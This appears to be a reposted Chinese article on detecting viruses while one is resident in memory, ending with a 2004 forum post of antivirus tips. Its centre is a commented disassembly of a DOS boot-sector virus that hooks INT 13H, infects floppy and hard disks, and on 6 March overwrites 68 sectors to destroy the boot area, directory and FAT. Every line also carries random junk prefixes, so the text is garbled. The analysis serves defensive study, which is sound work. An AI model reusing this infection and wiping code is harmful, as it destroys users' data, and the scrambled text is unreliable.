近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。
2Cz haO ??
$ZBYOA ?? 一 、 带毒环境下检测清除病毒的意义
yDafNH ??
A9MM^jV8 ?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。
<giBL L! ??
10FiA; ?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。
|:1{B1sqA ??
13X}pnW ?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。
7y'uZAF ??
^<CVQ8R7 ?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。
`pfIgryns ??
*U[yeE]. ?? 二 、带毒环境下检测清除病毒的原理
}mj9$=B4 ??
'>"{yi- ?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。
/sA&}kX}E ?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。
b5NVQ8Mq 8F}drK9>F 1hG# 举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister "
)!"fUz$ 病毒体:
+-!E%$ JMP 01AF ;JMP到01AF
S\A/*!%~y DB 00 ;病毒标计
e2O6q05 ?Q DW 00F5 ;此为搬到高位址后,远程跳转指令
WA`A/`taT DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX
:-1|dE)U DB 02
j,k3]bP DW 0003 ;此为软盘识别标记,硬盘为0007
h !^=
c DW EC59 ;
8q[;
0 DW F000 ;INT 13H的原入口
g_Z
tDxz .
L.HeBeO .
puC91 .
:>1nkm&Eg .
==dKC; .
YaC%69C' XOR AX,AX ;清除AX
FH~:&; MOV DS,AX; ;让DS=0000
4@PA+(kvS CLI ;清I标志积存器
Xqf,_I=V MOV SS,AX ;把堆栈设为0000:7C00也就是开机
|THpkfW MOV AX,7C00 ;后载入引导分区表的地址,目前地址
yaj dRU MOV SP,AX ;开机时为0000:7CB6
>pv.,cj STI ;设I标志积存器
BO[:=x` PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A
VzP az\e PUSH AX ;用RETF,把程序转到引导或分区表位置
3kn-tM MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置
G4)~p!TSQ MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在
;g|Vt}a&4 MOV AX,[004E] ;取INT 13H的段地址
za_b jE MOV [7C0C],AX ;存到010C
;+9OzF ; ;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13
sK}AS;: ;读写以便传播发作
'C[tPP 4ijtx)SA MOV AX,[0413] ;取得内存K数,放在AX
N''QQBUD DEC AX ;
Hb)FeGsd). DEC AX ;减2k内存
w'
7sh5 MOV [0413],AX ;存回,通常是638K
/{^k8
Q MOV CL,06 ;
@Vm*b@ SHL AX,CL ;
AFrJzh:V[ MOV ES,AX ;算出减2K后病毒本体的位址
9bM\ (s/
MOV [7C05],AX ;AX存入0105
<Riz!(G 5C Dk5B_ ;病毒常用手法将系统高段内存减少以便驻留
K zWo}tT ;这样可以免于被其他程序覆盖
'R7 \ uz8LF47@:- MOV AX,000E ;病毒拦INT 13H
n#(pT3&
;ISR起始的偏移量
V(7,N( MOV [004C],AX ;
JVc{vSa!rm MOV [004E],ES ;设原为病毒的INT 13H
:"%/u9<A MOV CX,01BE ;病毒长度为1BE
G|wtl(}3 MOV SI,7C00 ;从JMP 01AF开始
2cMCZuO XOR DI,DI ;DI=0
L+am-k:T~ CLD ;清方向标志
3Ua?^2l REPZ;
EW
`hL~{ MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或
:viW CS: ;分区表能载入0000:7C00正常运作
(> al-vZ6A JMP FAR [7C03] ;跳到为搬过后的位址
lzEynMO+ XOR AX,AX ;清AX
J&xZN8jW MOV ES,AX ;ES=0000
.GrOdDK$ns INT 13 ;复位磁盘
Zy}tZ RG PUSH CS ;
Un6R)MVT POP DS ;让DS=CS
2JfSi2T MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则
M>AxVL MOV BX,7C00 ;读到0000:7C00
7L!JP:v MOV CX,[0008] ;硬盘第0道,第7扇区
9d5$cV CMP CX,+07 ;比较是否从硬盘启动
I|@+O# JNZ 0213 ;不是跳0213
/DQYlNa MOV DX,0080 ;第一硬盘C:第零面
Vb0T)C INT 13 ;用INT 13号中断,读
y9:4n1fg JMP 023E ;跳023E比较日期,发作或正常开机
Tgdy;? MOV CX,[0008] ;软盘0道,第3扇区
+jLy>=u MOV DX,0100 ;A:的第0面
^b8~X [1J_ INT 13 ;INT 13读盘
y4^u&0}0$ JB 023E ;失败跳023E
"=h1gql' PUSH CS
xcB\Y:
POPES ;让ES=CS
vSgT36ZF MOV AX,0201 ;
P?0X az MOV BX,0200 ;
t<H"J__& MOV CX,0001 ;
At Wv9 MOV DX,0080 ;
Z
vysLHj INT 13 ;读入C:的分区表到0200,以便下面比较
a|ufm^F JB 023E ;失败跳023E
*6Wiq5M>. XOR SI,SI ;清SI
1!#N-^qk CLD ;清方向标志以便比较
`Q@7,z=f LODSW ;载入一个WORD到AX
M(-)\~9T CMP AX,[BX] ;比较有无病毒存在..E9AC
&uq.k{<p\ JNZ 0287 ;没有则跳0287传染
&K^0PzWWof LODSW ;载入一个WORD到AX
fLDrit4_Q CMP AX,[BX+02] ;再次确认..0000
!_Lmrs JNZ 0287 ;没有跳0287
Sc<dxY@w7- XOR CX,CX ;清CX
-&Rv=q> MOV AH,04 ;
{;yO3];Hqw INT 1A ;取得日期
yM_/_V|G CMP DX,0306 ;是否为三月六日
A}9Z%U JZ 024B ;是跳024B传染
.t8)`MU6. RETF ;把程序交还给引导启动完成
>xFvfuyC +-izC%G 步骤4:病毒INT 13代码分析
LF dvz0 方法:U
<L}@p8Lq PUSH DS ;首先把要用到积存器
?
wS}' PUSH AX ;入栈保存
:j\7</uu OR DL,DL ;比较是否为软盘
8!_jZ f8 JNZ 002F ;如不是则退出传染
gQnr. XOR AX,AX ;AX=0
)qWwh)\;! MOV DS,AX ;数据代段=0
pKSCC"i&j TEST BYTE PTR [043F],01 ;比较是否为A盘
vW+6_41ZM JNZ 002F ;不是则退出
`ecseBn3d POP AX ;将以上保存积存器
({uW-% POP DS ;弹栈恢复
@v-^j PUSHF ;压栈标志积存器
}[p{%:tP CS: ;以便执行原INT 13
iJs~NLCgVu CALL FAR [000A] ;执行原INT 13
{:X'9NEE PUSHF ;再次压栈
}d[(kC_ CALL 0036 ;以便跳转到传染程序
^FVdA1~/ POPF ;跳转到执行传染
+f3Rzx] RETF 0002 ;结束中断调用返回
opcanl9pSW POP AX ;恢复
v:O{"s POP DS ;堆栈
'/\ CS: ;跳转到原正常INT 13
mqSVd^ JMP FAR [000A] ;地址执行
}lZEdF9GhG %|-N{> wKy ;此段代码中展现了病毒常用手法,利用标志积存器做跳转
|XyX%5p* QPlU+5Cx 步骤5:传染过程分析
X 4;U4pU# 方法:U
`4"8@>D 对软盘传染过程:
]!hjKu" PUSH AX ;工
]S2rqKB PUSH BX ;作
)%(ZFn} PUSH CX ;寄
u6|C3,!z" PUSH DX ;存
oF%m PUSH DS ;器
)GP;KUVae PUSH ES ;入
\/
bd PUSH SI ;栈
J
En jc/ PUSH DI ;保存
%cF`x_h[j PUSH CS ;以压/弹栈方式
~D52b1f POP DS ;使数据段DS和
P\U<,f PUSH CS ;附加段ES均指向
qt8Y3:=8l POP ES ;代码段CS
OSu&vFKz MOV SI,0004 ;试4次
>M<3!?fW) MOV AX,0201 ;设置各
@6
he!wW MOV BX,0200 ;积存器
8Pn MOV CX,0001 ;为读软盘
+B? qx
Q XOR DX,DX ;引导扇区做准备
is.t,&H4P] PUSHF ;压栈标志积存器
=EJ&=t CALL FAR [000A] ;正常的INT 13调用
I%T+H[, JNB 0063 ;成功则转判断
pbMANZU[ XOR AX,AX ;不成功复位
iOfm:DTPr PUSHF ;磁盘继续读
=
0 ~4k# CALL FAR [000A] ;如果4次
)nN!% |J DEC SI ;均匀不成功
-#\ T JNZ 0045 ;则退出跳转
1/dL-"*0 JMP 00A6 ;退出传染
8Km&3nCv$Q XOR SI,SI ;SI=0以便用
G ek?+|m CLD ;LODSW读入软盘
L%/RD2LD LODSW ;第1或第2字进行比较
7oZ:/6_> CMP AX,[BX] ;比较如果不包含病毒标志
ETDWG_H | JNZ 0071 ;则跳转写传染
fNNl1Vls LODSW ;如果已有标志
`z!AjAT-G CMP AX,[BX+02] ;则退出
z'L0YqXG/ JZ 00A6 ;传染子程序
T3w%y`K MOV AX,0301 ;为写盘准备
*C*J1JYp+ MOV DH,01 ;如果是360K
DB}Uzw| MOV CL,03 ;则写到1面0道3扇区
6-U_TV CMP BYTE PTR [BX+15],FD ;比较软盘
9q;O`& JZ 0080 ;如果大于360K
:H}iL* MOV CL,0E ;写到1面0道14扇区
(KQLh,h7 MOV [0008],CX ;写病毒标志到软盘
J0sD?V|{1~ PUSHF ;调用原INT 13
(UkP AE CALL FAR [000A] ;进行传染
ing'' _ JB 00A6
:6Ri% Nb MOV SI,03BE ;以下是将正常
/|EdpHx0 MOV DI,01BE ;引导扇区从
4D65VgVDM MOV CX,0021 ;1BE起的21字节内容
a%#UF@I CLD ;搬移到病毒程序尾部
Tm%5:/<8 REPZ ;开始复制
}7.A~h MOVSW
[$dVs16K MOV AX,0301 ;写盘功能调用,写一个扇区
<\229 XOR BX,BX ;将病毒程序
t=%zY~P MOV CX,0001 ;写入软盘引导扇区内
j0l{Mc5 XOR DX,DX ;设置为软盘
J""Cgf PUSHF
lm`*x=x CALL FAR [000A] ;执行正常INT 13调用写盘
!j!w$ POP DI ;将
Y9.3`VX POP SI ;工
-}7$;QK&a POP ES ;作
dL42)HP5 POP DS ;寄
@A[)\E1 POP DX ;存
%. 1/#{ POP CX ;器
v
:pT(0N POP BX ;退
n_kwtWX( POP AX ;栈
\8CCa(H RET ;返回调用处
.@ H:P 对硬盘传染过程:
yi$CkG} MOV CX,0007 ;第7扇区
&xGdKH
MOV [0008],CX ;此处为硬盘引导标记
{B$CqsvJ MOV AX,301 ;写功能调用
80nE QT
y MOV DX,0080 ;设置为硬盘
LnR>!0:c INT 13 ;将正常引导扇区写到0面0道7扇区内
WwmYJl0 JB 13E ;失败则转
'm<Lx _i MOV SI,03BE ;原分区表地址
=2!p>>t,d; MOV DI,01BE ;目标地址
0cm34\* MOV CX,0021 ;整个分区表
IMM;LC%rD9 REPNZ
z5@XFaQ MOVSW ;开始复制
D]~K-[V?l ;此段代码是将硬盘分区信息,搬移到病毒程序尾部
rWht},-|1 ;这样在分析着查看硬盘分区信息时仍能看到该部分
a`wjZ"}'[ ;内容,以次来麻痹分析者
3kxo1eb
MOV AX,0301 ;准备写病毒提进硬盘
|/,SNE XOR BX,BX ;病毒体位置
"uH>S+%|b INC CL ;第一扇区
0i~U(qoI INT 13 ;开始写盘传染
#A)V JMP 013E ;转到13E处判断是否为3月6日,是则发作
J|WE&5' +n1!xv] 步骤6:破坏过程分析
~RR!~q 方法:U
':.Hz]]/A 主要分析对硬盘数据破坏:
:1 +Aj
( .
Jv} .
{!Qu(% .
^4sfVpD2! .
mSYjc)z .
M`Y^hDl 6 MOV DL,80
%lCZ7z2o MOV BYTE PTR[0007],04
H-_gd.VD ;准备写硬盘
J;& y?%{@5 MOV AL,11 ;写17个扇区
::Zo` vP MOV BX,5000
/WQ.,a MOV ES,BX ;从内存ES:5000中处开始写
EL,k z8 INT 13 ;残不人睹
ztVTXI%Kz JNB 0179 ;成功转179继续写
\%7*@& XOR AH,AH
/,G `V INT 13 ;不成功复位磁盘继续
'!m6^*m|c INC DH ;使写操作磁头加1继续?
xpdpD CMP DH,[0007] ;比较是否小于0007单元值
1T|f<ChIF< JB 0150 ;是则返回开始处继续写
eB0exPz% XOR DH,DH ;DH=0
rbvk.:"^w INC CH ;再加扇区
vr;`h/ JMP 0150 ;反回继续写
FJvY`zqB ;以上操作实际上是对硬盘执行4次写操作,每次17个扇区
HXq']+iC ;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录
JM7mQ'`Ud ;和文件分配表。
VR(R. mCO1,? 引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次
ox-m)z `7 读盘的时将自身写入磁盘。
JxIJxhA> 引导过程如下:
Nbl&al@" 1>调整堆栈位置
0? {ADQz 2>修改并用修改后的磁盘参数表来复位磁盘系统
4*EMd!E=< 3>计算根目录表的首扇区的位置及IO.SYS的扇区位置
ytttF5- 4>读入根目录表的首扇区
FWbp;v{ 5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS
Z6I|Y5#H 6>将IO.SYS文件开头三个扇区读入内存0000:0700H处
[c{\el9H 7>跳到0000:0700H处执行IO.SYS,引导完毕
bZxN]6_ 003E FA CLI
o[>d"Kp 003F 33C0 XOR AX,AX
&%OY"Y~bI! 0041 8ED0 MOV SS,AX
y% bIO6u: 0041 8ED0 MOV SS,AX
4c5BlD 0043 BC007C MOV SP,7C00 ; 初始化堆栈
%IsodtkDu 0046 16 PUSH SS
0pE>O7 0047 07 POP ES ;(ES)=0000H
bRvGetX 0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H
@&\Y:aRO%i 004B 36 SS: ;(SS)=0000H
$tZ
{>!N 004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI
8lusKww 004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表
SAP/jD$5]> 004F 56 PUSH SI ;取到后压入堆栈中保存
a=2.Y? 0050 16 PUSH SS
Vk{;g 0051 53 PUSH BX ;保存地址0000:0078H
\_Bj"K 0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推
9KVJk</:n 0055 B90B00 MOV CX,000B ;磁盘参数表共11字节
]BO:*&O 0058 FC CLD
>.meecE?Q 0059 F3 REPZ
33oW3vS 005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处
J?O0ixU 005B 06 PUSH ES
01r%K@ xX\ 005C 1F POP DS ;(DS)=0000H
(p>|e\(]0 005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间"
}n^Rcz6HeO 0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数"
TIGtX]` 0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数"
*(9Tl]w 0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址)
GLsa]}m,9 006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号
vT?^# 006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表
^_]ZZin 0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘
<Kt_
oxK, 0072 7279 JB 00ED ;出错则转出错处理
{SV/AN ofB:7 ; 下面一段程序计算扇区位置
NW1 Jr/ 0074 33C0 XOR AX,AX
Y-ao
yoNS 0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数
UGAV"0 007A 7408 JZ 0084 ;为零表示大硬盘?
<YyE1| 007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处
(%6fMVp 0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的
%7ngAIg 0084 A0107C MOV AL,[7C10] ;取FAT表的个数
hTDK[4e 0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数
{s8c@-' 008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位)
>pF* unC; 008F 13161E7C ADC DX,[7C1E] ; 高位
zj7ta[<tr 0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位)
V,-we|" 0097 83D200 ADC DX,+00 ; (高位)
&5 "!0 009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位)
3^/w`(-{@ 009D 8916527C MOV [7C52],DX ; (高位)
.\
Ijq! 00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位)
`*s:[k5k 00A4 89164B7C MOV [7C4B],DX ; (高位)
\0)jWCK 00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节
%jL^sA2;c+ 00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数
ea=E/HR- 00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数"
_,drOF|e 00B3 03C3 ADD AX,BX ;这两条指令是为了取整
s+:|b~ 00B5 48 DEC AX
$cSUB 00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数
KW:N
6w 00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位)
B%tF|KKj 00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位)
nXT`7 ;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS
yXU.PSG* 00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值
gkr9+ 00C4 8B16527C MOV DX,[7C52] ;取根目录表的首扇的逻辑扇区号(高位)
81Z;hO"~ 00C8 A1507C MOV AX,[7C50] ; (低位)
f"s_dR 00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号
*L^W[o 00CE 721D JB 00ED ;出错则转出错处理
Da-Lf2qT9 00D0 B001 MOV AL,01
d"XZlEV 00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇)
t'U=K>7 00D5 7216 JB 00ED ;出错处理
C5~~$7k0 00D7 8BFB MOV DI,BX ;内存缓冲区的首址
HPphTu}` 00D9 B90B00 MOV CX,000B ;比较11个字节
|^Iox0A 00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节
WZ' Z"' 00DF F3 REPZ
_wKwiJs 00E0 A6 CMPSB ;看第一项是否为IO.SYS
Jxvh; 00E1 750A JNZ 00ED ;不是则出错
PK+sGV 00E3 8D7F20 LEA DI,[BX+20] ;跳过32字节就指向第二项
x_Ev2
c'4 00E6 B90B00 MOV CX,000B ;比较11个字节
}5+^ 00E9 F3 REPZ
H~FI@Cf$L 00EA A6 CMPSB ;看第二项是否为MSDOS.SYS
>+{WiZ` 00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理
qPPe)IM'Sc d6MWgg ;下面一段进行出错处理
q;68tEupR 00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..."
!+SL=xy!{ 00F0 E85F00 CALL 0152 ;显示字符串
Ro<779.Gn\ 00F3 33C0 XOR AX,AX
\B#tB?rA
00F5 CD16 INT 16 ;等待任一键按下
c!\Gj| 00F7 5E POP SI
Tri\5O0lPs 00F8 1F POP DS ;得到1EH号中断向量的地址0000:0078H
SA<\n+>q^ 00F9 8F04 POP [SI]
X /c8XLe" 00FB 8F4402 POP [SI+02] ;恢复1EH号中断向量的内容
I# tlaz# 00FE CD19 INT 19 ;自举
-DkD*64wu 0100 58 POP AX
;+~5XLk 0101 58 POP AX
.`IhxE~mN 0102 58 POP AX ;清理堆栈
h`6 (Oo| 0103 EBE8 JMP 00ED ;再次试图起动
h7#\]2U$[5 <q7o"NI6FZ ;下面读入IO.SYS的头3个扇区到内存0000:0700H处
m}l);P^ 0105 8B471A MOV AX,[BX+1A] ;从根目录表第一项中取IO.SYS的首簇号
o898pg 0108 48 DEC AX
27!FB@k- 0109 48 DEC AX ;首簇号减二
MG=E
6: 010A 8A1E0D7C MOV BL,[7C0D] ;取每簇的扇区数
\WiCI: 010E 32FF XOR BH,BH
T1C_L?L 0110 F7E3 MUL BX ;(首簇号 - 2)乘以 每簇的扇区数
YYT;a$GTo 0112 0306497C ADD AX,[7C49] ;相加后得到IO.SYS的首扇的逻辑扇区号
M86"J:\u] 0116 13164B7C ADC DX,[7C4B]
i%o%bib# 011A BB0007 MOV BX,0700 ;内存缓冲区的偏移值
9Jwd *gevV 011D B90300 MOV CX,0003 ;循环计数初值,读3个扇区
Z:{|
?4 0120 50 PUSH AX ;逻辑扇区号进栈(低位)
&. =8Q? 0121 52 PUSH DX ; (高位)
lrE"phYk 0122 51 PUSH CX ;循环计数器进栈
TdPd8ig8{ 0123 E83A00 CALL 0160 ;逻辑扇区号转换为物理扇区号
RiTL(Yx 0126 72D8 JB 0100 ;出错处理
K$Bv4_|x 0128 B001 MOV AL,01
!Q>xVlPVu 012A E85400 CALL 0181 ;读一个扇区到内存缓冲区
wh(_<VZ 012D 59 POP CX ;循环计数出栈
KkUK" Vc 012E 5A POP DX
:A8r{`R'N 012F 58 POP AX ;逻辑扇区号出栈
8c) eaDu 0130 72BB JB 00ED ;读盘出错处理
KtaoOe 0132 050100 ADD AX,0001
{dF@Vg_n 0135 83D200 ADC DX,+00 ;下一个扇区
L -Q8iFW' 0138 031E0B7C ADD BX,[7C0B] ;缓冲区指针移动一个扇区的大小
#zP-,2!r 013C E2E2 LOOP 0120 ;循环读入三个扇区
@V
' HX 013E 8A2E157C MOV CH,[7C15] ;取"磁盘介质描述",传给IO.SYS
%V=%ARP| 0142 8A16247C MOV DL,[7C24] ;取"系统文件所在的驱动器号"
BvP\c_ 0146 8B1E497C MOV BX,[7C49] ;取IO.SYS的首扇的逻辑扇区号
<6(0ZO%,C! 014A A14B7C MOV AX,[7C4B]
Ts.2\-+3 014D EA00007000 JMP 0070:0000 ;执行IO.SYS,引导完毕
q|ce7HnK ;显示字符串的子程序
20}HTV{v 0152 AC LODSB ;从串中取一个字符
%UI^+:C 0153 0AC0 OR AL,AL
j/aJD E(+ 0155 7429 JZ 0180 ;为0则已到串尾,返回(共用RET指令)
#]dm/WzY 0157 B40E MOV AH,0E
JL,Y9G*]s 0159 BB0700 MOV BX,0007
wXUR9H|0( 015C CD10 INT 10 ;显示该字符
o<5`uV!f 015E EBF2 JMP 0152 ;循环显示下一个
[3X\"x5@V ;将逻辑扇区号转换为物理扇区号的子程序
)1
-<v); 0160 3B16187C CMP DX,[7C18] ;这两条指令是为了避免第二次除法时除数
XHA|v^ 0164 7319 JNB 017F ;为0
r:sa|+ 0166 F736187C DIV WORD PTR [7C18] ;逻辑扇取号除以每道扇区数,商(AX)=总磁
S]@;`_?m{ 016A FEC2 INC DL ;道数,余数(DX)再加一即为扇区号,因为扇
@K <Onh` 016C 88164F7C MOV [7C4F],DL ;区号是从1开始的,而不是从0开始
J!om"h 0170 33D2 XOR DX,DX
sV#%U%un 0172 F7361A7C DIV WORD PTR [7C1A] ;总磁道数(AX)再除以面数,所得的
~Z5AIm R| 0176 8816257C MOV [7C25],DL ;余数(DX)=面号(即磁头号)
u4hn9**a1 017A A34D7C MOV [7C4D],AX ;商(AX)=磁道号
o%'1=d3R1Q 017D F8 CLC
}-tJ .3Zw 017E C3 RET ;正常返回
>12jU m) 017F F9 STC
WHx#; 0180 C3 RET ;异常返回
frcX'M}% ;读一个扇区的子程序
K3mP 6Z#2 0181 B402 MOV AH,02 ;读功能调用
*Hx*s_F 0183 8B164D7C MOV DX,[7C4D] ;需要的入口参数如下:
FF#Aq 0187 B106 MOV CL,06 ;(DL)=驱动器号
%fg6',2 0189 D2E6 SHL DH,CL ;(DH)=面号
H@-q NjM 018B 0A364F7C OR DH,[7C4F] ;(CH)=磁道号
,
>WH)+a 018F 8BCA MOV CX,DX ;(CL)=扇区号(第6,7位为磁道号的高2位)
LZ)g&A(j? 0191 86E9 XCHG CH,CL ;(AL)=要读的扇区数
x:-NTW
-g 0193 8A16247C MOV DL,[7C24] ;(ES:BX)=缓冲区首址
@A6iY 0197 8A36257C MOV DH,[7C25]
s={>{,E 019B CD13 INT 13
KH,f'` 019D C3 RET
#;8)UNc)} 9x下的主引导/引导扇区没大区别,为了识别大分区用了一个INT 13的扩展调用42H。
_jX,1+M }36A eJ7L ??
K{d3)lVYCS ?? 既然病毒是通过接管中断来获取传染和破坏的机会,那么我们是否有办法找回被病毒接管的中断 服务程序的地址,从而杀毒软件可以直接调用原中断,避免激活病毒? 笔者认为这是可能的,因为病毒在接管中断后,一般只对读写操作 、文件操作和执行等子功能调用感兴趣,对于其他一些功能调用,病毒只是简单地调用原中断服务程序进行处理,并通常使用下列指令进行调用:
9<3( QR ?? jmp xxxx:xxxx
Tbm
~@k(C ?? call xxxx:xxxx
#U- y<[
3 jmp far ptr cs:[xxxx]
"&H'?N%9Up call far ptr cs:[xxxx]
A_TaXl( ??
=+_nVO* ?? 以INT21H为例,我们可以调用取DOS版本号的子功能3306H,对整个调用过程进行单步跟踪,并假设病毒驻留的段地址与INT21H原中断段地址是不同的,如果调用过程中CS发生改变,我们把每次CS改变后 执行的第一条指令的地址都记录下来,那么INT21H原来的中断地址也必定在其中。
2Rw<0.i| ??
yhgGvyD ?? 但记录的地址不止一个,究竟哪个是我们所要找的呢?这里我们可以假设病毒在调原中断服务程序时把各个寄存器(指AX、BX、CX、DX 、SI、DI、DS、ES)都设置成我们调用时所设置的值,同时真正的中断服务程序返回时又会改变寄存器的值,这个假设在绝大多数情况下都是正确的,从该假设出发,只需在各个寄存器值有改变的情况下,记录下每次CS改变后的第一条指令的地址,那么在中断返回后,记录中的最近一个地址就是所需找的原中断地址。需要指出的是,如果内存中还有其他驻留程序也接管了INT21H所找到的地址同样绕过了这些驻留程序。
{-I+ --------------------------------------------------------------------------------
j)/Vtf 作者: 网络虫虫 时间: 2004-5-28 10:02 标题: [杀毒请注意]新老朋友请阅反病毒技巧 敬请补充指正
oOprzxf"+Z *m]Y6 发现病毒,但是无论在安全模式还是Windows下都无法清除怎么办?
oU)(/ !%$[p' 由于某些目录和文件的特殊性,无法直接清除(包括安全模式下杀毒等一些方式杀毒),而需要某些特殊手段清除的带毒文件。以下所说的目录均包含其下面的子目录。
N/F_,>E 1、带毒文件在\Temporary Internet Files目录下。
_
uOi:Ti 由于这个目录下的文件,Windows会对此有一定的保护作用(未经证实)。所以对这个目录下的带毒文件即使在安全模式下也不能进行清除,对于这种情况,请先关闭其他一些程序软件,然后打开IE,选择IE工具栏中的"工具"\"Internet选项",选择"删除文件"删除即可,如果有提示"删除所有脱机内容",也请选上一并删除。
N?m)u,6-l 2、带毒文件在\_Restore目录下,或者System Volume Information目录下。
B=*0 这是系统还原存放还原文件的目录,只有在装了Windows Me/XP操作系统上才会有这个目录,由于系统对这个目录有保护作用。对于这种情况需要先取消"系统还原"功能,然后将带毒文件删除,甚至将整个目录删除也是可以的。 关闭系统还原方法。WindowsMe的话,禁用系统还原,DOS下删除。具体请参考下文:
IiniaVuQ http://community.rising.com.cn/Forum/msg_read.asp?FmID=33&SubjectID=2028691&page=1。XP关闭系统还原的方法:右键单击“我的电脑”,选“属性”——“系统还原”——在“在所有驱动器上关闭系统还原”前面打勾——按“确定”退出。
<%.%q 3、带毒文件在.rar、.zip、.cab等压缩文件中。
te[uAJ1 N 现今能支持直接查杀压缩文件中带毒文件的反病毒软件还很少,即使有也只能支持常用的一些压缩格式;所以,对于绝大多数的反病毒软件来说,最多只能检查出压缩文件中的带毒文件,而不能直接清除。而且有些加密了的压缩文件就更不可能直接清除了。
(^W}uDPCB 要清除压缩文件中的病毒,建议解压缩后清除,或者借助压缩工具软件的外挂杀毒程序的功能,对带毒的压缩文件进行杀毒。
cS Lj\'`b 4、病毒在引导区或者SUHDLOG.DAT或SUHDLOG.BAK文件中。
q5r7KYH{ 这种病毒一般是引导区病毒,报告的病毒名称一般带有boot、wyx等字样。如果病毒只是存在于移动存储设备(如软盘、闪存盘、移动硬盘)上,就可以借助本地硬盘上的反病毒软件直接进行查杀;如果这种病毒是在硬盘上,则需要用干净的可引导盘启动进行查杀。
q+[ )i6!? 对于这类病毒建议用干净软盘启动进行查杀,不过在查杀之前一定要备份原来的引导区,特别是原来装有别的操作系统的情况,如日文Windows、Linux等。
hbYstK;]Z 如果没有干净的可引导盘,则可使用下面的方法进行应急杀毒:
Mo@{1K/9 (1) 在别的计算机上做一张干净的可引导盘,此引导盘可以在Windows 95/98/ME系统上通过"添加/删除程序"进行制作,但要注意的是,制作软盘的操作系统须和自己所使用的操作系统相同;
:JSxsA6k (2) 用这张软盘引导启动带毒的计算机,然后运行以下命令:
3F"vK A:\>fdisk/mbr
SOG(&)b
A:\>sys a: c:
GI{EP&